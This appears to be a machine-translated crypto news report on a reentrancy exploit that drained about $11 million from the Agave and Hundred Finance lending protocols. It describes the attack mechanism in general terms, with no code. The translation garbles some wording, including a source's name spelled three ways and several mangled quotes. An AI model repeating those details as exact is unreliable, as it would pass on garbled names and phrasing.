Hacker stole nearly $ 11 million in encapsulated Ethereum (WETH), BTC (wBTC), Chainlink (LINK), USD Coin (USDC), Gnosis (GNO) and XDAI (wxDAI) wrapped using “re-entry” “. Attack on Agave and Hundred Finance (DeFi) applications.
The attack took place within 24 hours of the Deus Finance exploitation, in which hackers stole more than $ 3 million in Dai (DAI) and Ether (ETH) from a loan contract platform.
According to CoinGecko, the Agave AGVE token fell by 20% after the attack. The HND token from HND fell 3.5% after the vulnerability was announced. However, it has since recovered and reached a 24-hour high.
“Agave is investigating the abuse of Agave’s financial protocol,” Agave wrote on Twitter on Tuesday. “We will let you know as soon as we know more.” They indicated that the contracts are on hold until the situation is resolved.
Hundred Finance also tweeted that it had been used on the Gnosis network and had suspended its markets during investigations.
According to an analysis of the chain, the address associated with the attacker sent more than 2100 ETH worth over 5.5 million dollars to a cryptomixer in an attempt to launder the stolen tokens.
Related: Deus Finance Exploit: Hackers managed to get DAI and Ethereum worth $ 3 million
Solidity developer and creator of the liquidity protocol application NFT Shegen (shegenerates) tweeted that it lost $ 225,000 due to the utilization. The investigation showed that the attack was successful by taking advantage of WETH’s Gnosis Chain contract function, which allowed the attacker to continue borrowing cryptocurrencies before the apps could settle the debt, and prevented further loans.
The attacker carried out this exploitation by constantly borrowing against the same security that he hosted until the funds were deducted from the protocols.
Shegen told the Cointelegraph that while the smart contract on Agave is essentially the same as the one on Aave, which saves $ 18.4 billion, “every security researcher has tested it,” she said. “So it is reasonable to assume that the contract is secure.”
“I think this hack stands out more than some of the larger hacks,” said Shigen, noting that although it was a smaller hack compared to others that stole millions, the resemblance to Aave means that it “looks safe on highest level, but it was not, and this failed. ” Relying on it hurts. ”
“It’s like you can not even trust ‘secure’ code.”
Blockchain security researcher Mudit Gupta says the difference between Aave and Agave is that “Aave actively checks back access before placing tokens on the main network to avoid such attacks.”
Shejn said it does not blame the Agave developers for not preventing the attack.
“Agave has been used in an unsafe way,” she said. “Perhaps the developer should not allow callback tokens on the platform or add extra protection against re-entry.”
“Curve, for example, is not hacked today because it has extra protection against re-entry, but I do not really blame Luigi and the Agave team because it probably will not happen and it has bypassed many people.”